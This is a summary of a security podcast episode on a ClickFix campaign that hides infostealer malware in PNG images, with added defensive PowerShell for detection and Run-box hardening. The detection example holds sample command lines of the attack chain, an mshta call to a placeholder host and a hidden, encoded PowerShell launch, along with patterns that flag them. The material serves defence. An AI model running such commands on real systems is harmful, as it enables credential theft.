CyberWire Daily: Research Saturday
Episode: Picture perfect deception
Date: January 17, 2026
Host: Dave Bittner, N2K Networks
Guest: Ben Folland, Security Operations Analyst at Huntress
Research Focus: ClickFix campaign leveraging steganography to deliver info-stealing malware
Episode Overview
This episode delves into recent research by Huntress on a malware delivery campaign dubbed “ClickFix Gets Creative: Malware Buried in Images.” Security Operations Analyst Ben Folland explains how attackers employ basic social engineering and technical evasion—specifically steganography—to deliver infostealer malware through seemingly innocuous images. The episode highlights attack mechanics, evolving lure techniques, payload capacities, threat actor sophistication, and actionable defenses for organizations.
Key Discussion Points & Insights
1. Introduction to ClickFix Malware Campaign
[01:48-02:19]
- ClickFix is a simple malware delivery technique primarily exploiting human gullibility. Victims are typically tricked into copying and pasting a malicious command, triggering the compromise.
- A unique aspect of this campaign: steganography. Malicious payloads are concealed within benign-looking PNG images.
- Quote:
Ben Folland [02:19]:
"The malware leveraged a technique called steganography and it hid the actual final core infostealing malware payload within a benign PNG image... This is something we don't often see and it's an interesting evasion technique."
2. How Steganography Defeats Conventional Detection
[03:43-04:42]
- Image files are generally perceived as harmless, making them ideal for hiding malicious code.
- Even thorough inspection of these images wouldn't readily reveal the embedded malware without insight into the extraction process.
- Antivirus software usually fails to flag these images, as payload extraction requires specific execution logic.
- Quote:
Ben Folland [03:54]:
"...Malware embedded with images can be written to disk and antivirus can scan them all they want, but they won't be able to identify the hidden payload inside the image because the method... is really hard for antiviruses to automatically detect."
3. ClickFix Lures: Robot Verification vs. Fake Windows Update
[04:42-08:48]
- Two major lures:
  - Robot verification page ("fake captcha"): Looks like a standard web verification step. Often AI-generated or low-effort, but still effective, especially on compromised legitimate sites.
  - Fake Windows Update screen: Highly sophisticated and convincing. Drives the browser to fullscreen, hides the cursor, and fakes a Windows update sequence. Provides fake instructions to open Windows Run, with malicious commands automatically copied to the clipboard via JavaScript.
- The update-themed lure is particularly effective, as users feel compelled to follow visible directions, especially under apparent system 'lockdown'.
- Quote:
Ben Folland [06:45]:
"...When you visit the website, it will try to trick you into thinking Windows has started an update sequence and your browser will go into full screen, your mouse cursor will go hidden..."
- Once the command is run, infostealing malware becomes active, searching for browser credentials, crypto wallets, sensitive files, and exfiltrating data to attackers.
4. Multi-Stage Execution Chain
[09:53-12:46]
- The campaign consists of multiple, obfuscated stages:
  - User pastes malicious command (from lure page).
  - MSHTA (a legitimate Windows component) is used to avoid triggering antivirus, downloading and running further payloads in memory.
  - PowerShell scripts are subsequently executed to decrypt and load more code.
  - Eventually, a .NET binary with an embedded PNG image executes, extracting shellcode hidden within the image's pixel data using XOR operations.
- Technical depth: Carefully staged to avoid disk artifacts, splitting the execution and extraction logic, further complicating detection and analysis.
- Quote:
Ben Folland [11:23]:
"...The threat actors had put a lot of effort into obfuscating and using steganography... make analysts like myself's lives harder by splitting it into so many different stages."
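The chain above (a pasted command, MSHTA started from the shell, PowerShell spawned to continue in memory) leaves a parent/child process trail even when nothing touches disk. The following is an added example, not code from the episode or from Huntress: a small PowerShell detection pass over constructed process-creation records whose field names follow Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, ParentImage, CommandLine, User). The URL, hostnames, paths and command lines in the sample records are made up for illustration.

```powershell
# Added example (not from the episode or Huntress). Constructed sample records
# modeled on Sysmon Event ID 1 fields; only the third record is part of the chain
# the episode describes. Hostname example.invalid is a placeholder.
$events = @(
    [pscustomobject]@{ ProcessId=4100; ParentProcessId=1200; Image='C:\Windows\explorer.exe';
        ParentImage='C:\Windows\System32\userinit.exe'; CommandLine='explorer.exe'; User='CORP\alice' }
    [pscustomobject]@{ ProcessId=5120; ParentProcessId=4100; Image='C:\Windows\System32\mshta.exe';
        ParentImage='C:\Windows\explorer.exe'; CommandLine='mshta https://cdn.example.invalid/verify'; User='CORP\alice' }
    [pscustomobject]@{ ProcessId=5200; ParentProcessId=5120; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe';
        ParentImage='C:\Windows\System32\mshta.exe'; CommandLine='powershell -w hidden -enc AAAA'; User='CORP\alice' }
    # Benign look-alikes: a local HTA launched from the shell, and a SYSTEM maintenance script.
    [pscustomobject]@{ ProcessId=6000; ParentProcessId=4100; Image='C:\Windows\System32\mshta.exe';
        ParentImage='C:\Windows\explorer.exe'; CommandLine='mshta "C:\Program Files\Vendor\setup.hta"'; User='CORP\alice' }
    [pscustomobject]@{ ProcessId=6100; ParentProcessId=3000; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe';
        ParentImage='C:\Windows\System32\svchost.exe'; CommandLine='powershell -File C:\Scripts\inventory.ps1'; User='NT AUTHORITY\SYSTEM' }
)

function Find-ClickFixChain {
    param([Parameter(Mandatory)][object[]]$Events)

    $findings = foreach ($e in $Events) {
        # Stage 1: the pasted Run-box command. A command entered in the Run dialog is
        # started by explorer.exe, so mshta.exe with a remote URL under that parent is the root.
        $isShellParent = $e.ParentImage -match '\\explorer\.exe$'
        $isMshtaUrl    = ($e.Image -match '\\mshta\.exe$') -and ($e.CommandLine -match '(?i)\bhttps?://')
        if (-not ($isShellParent -and $isMshtaUrl)) { continue }

        $score   = 2
        $reasons = [System.Collections.Generic.List[string]]::new()
        $reasons.Add('explorer.exe -> mshta.exe with remote URL')

        # Stage 2: PowerShell spawned by that mshta process, which is how the in-memory stages continue.
        $children = $Events | Where-Object { $_.ParentProcessId -eq $e.ProcessId -and $_.Image -match '\\powershell\.exe$' }
        foreach ($c in $children) {
            $score += 1
            $reasons.Add('mshta.exe -> powershell.exe')
            # A hidden window or encoded command raises confidence further.
            if ($c.CommandLine -match '(?i)-(enc(odedcommand)?|w(indowstyle)?\s+hidden)\b') {
                $score += 1
                $reasons.Add('hidden/encoded PowerShell')
            }
        }

        [pscustomobject]@{
            User    = $e.User
            RootPid = $e.ProcessId
            Score   = $score
            Verdict = $(if ($score -ge 4) { 'High' } elseif ($score -ge 3) { 'Medium' } else { 'Low' })
            Reasons = ($reasons -join '; ')
        }
    }
    return $findings
}

# Expected on the sample set: one finding for CORP\alice rooted at PID 5120, score 4, verdict High.
Find-ClickFixChain -Events $events | Format-Table -AutoSize
```

Only the mshta.exe record that carries a remote URL under explorer.exe is scored; the local HTA and the SYSTEM script fall through. The explorer.exe parent is specific to the Run-dialog lure the episode describes, so a production rule should also score mshta.exe with a URL argument under other interactive parents and pivot on the later stages (in-memory PowerShell followed by a .NET process) rather than rely on the root alone.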
5. The Payloads: LummaC2 & Rhadamanthys Infostealers
[12:46-15:34]
- Both are powerful, well-known "malware as a service" infostealers available on dark web forums, often rented out to attackers.
- Capabilities include stealing browser credentials, Outlook or desktop app credentials, crypto wallet info, and intercepting clipboard content for sensitive data like crypto keys.
- Recent international law enforcement actions have targeted these malware families' infrastructure, but disruptions are rarely permanent.
- Quote:
Ben Folland [13:56]:
"LummaC2 can do an interesting capability. It can intercept clipboard information... and exfiltrate them back to the threat actor, which is an interesting way of stealing this data."
6. Attribution & Threat Actor Sophistication
[15:34-16:54]
- The perpetrating accounts advertise on Russian-language cybercrime forums; specific identities are unknown.
- Not believed to be APT or nation-state operations—these are opportunistic, low-to-moderate sophistication campaigns, but remain highly impactful due to infostealer prevalence.
- Quote:
Ben Folland [16:13]:
"As a whole, these aren't a super sophisticated threat, but they're a high impact threat. Info stealers as a whole are the most prolific malware we see in the wild."
7. Defensive Recommendations
[17:02-18:46]
- Security awareness training must now explicitly cover ClickFix and fake captcha/update lures—not just traditional phishing methods.
- Restrict use of the Windows Run box (via Group Policy or registry edits). Limit PowerShell access for non-IT users.
- Acknowledge training alone isn’t sufficient—technical mitigations must back up user education.
- Quote:
Ben Folland [17:23]:
"Security awareness training is really important. But... it doesn't always work. And this is why we need to implement stronger mitigation... blocking the Windows run box... And you can do the same with PowerShell..."
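The Run-box restriction mentioned above has a registry form that can be applied and verified without waiting for a Group Policy refresh. The script below is an added example, not code from the episode or from Huntress. NoRun under the Explorer Policies key is the value that the Group Policy setting "Remove Run menu from Start Menu" writes; set to 1 it disables the Run dialog (Win+R) for the user. It assumes the change is applied to the current user's hive (HKCU); the same value under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer applies to every user of the machine.

```powershell
# Added example (not from the episode or Huntress): apply and check the NoRun policy.
# Assumption: current-user scope (HKCU). Run on a lab machine first.
$PolicyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'

function Get-RunBoxState {
    # Weak default: key or value missing, or NoRun = 0, means the Run dialog is available.
    $value = (Get-ItemProperty -Path $PolicyKey -Name NoRun -ErrorAction SilentlyContinue).NoRun
    if ($value -eq 1) { 'Blocked' } else { 'Allowed' }
}

function Disable-RunBox {
    # Hardened setting: NoRun = 1 (REG_DWORD) under the Explorer Policies key.
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    New-ItemProperty -Path $PolicyKey -Name NoRun -PropertyType DWord -Value 1 -Force | Out-Null
}

function Enable-RunBox {
    # Rollback, so the change can be trialled and reverted on a test account.
    Remove-ItemProperty -Path $PolicyKey -Name NoRun -ErrorAction SilentlyContinue
}

"Run box before: $(Get-RunBoxState)"
Disable-RunBox
"Run box after:  $(Get-RunBoxState)"
# Explorer reads the policy at the next logon (or after explorer.exe is restarted).
```

This closes only the Run dialog; it is one layer, and the PowerShell limitation the episode also calls for is a separate control (an application-control policy such as AppLocker, scoped to non-IT users) rather than a registry value. Deploy the value through Group Policy for fleet-wide enforcement and use Get-RunBoxState, or the equivalent registry query in your endpoint agent, to confirm it actually landed on the endpoints you care about.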
Notable Quotes & Moments
- Steganography's Rare Use:
Ben Folland [02:19]:
"This is something we don't often see and it's an interesting evasion technique. A way of hiding the malicious code within a benign image."
- On Lure Effectiveness:
Ben Folland [07:49]:
"Their screen would go into full screen... unlikely to call up IT or ask for help when they've got some instructions right in front of them..."
- Defensive Frustration:
Ben Folland [11:23]:
"It's clear they wanted to make analysts like myself's lives harder by splitting up into so many different stages."
Important Segment Timestamps
- Intro & Concept: [01:48-02:19]
- Steganography Explained: [03:43-04:42]
- Fake Captcha vs. Windows Update Lures: [04:42-08:48]
- Execution Chain Detail: [09:53-12:46]
- Payload Description: [12:46-15:34]
- Attribution & Impact: [15:34-16:54]
- Defensive Advice: [17:02-18:46]
Episode Takeaways
- Attackers continue to reliably exploit the weakest link—users—through ever-more convincing social engineering tactics.
- Advancements in technical evasion, such as steganography within PNG images, are challenging traditional detection tools.
- Defenders should broaden awareness efforts beyond email phishing to include new techniques like ClickFix and enhance endpoint controls accordingly.
For further details, the full Huntress research is available via the show notes.
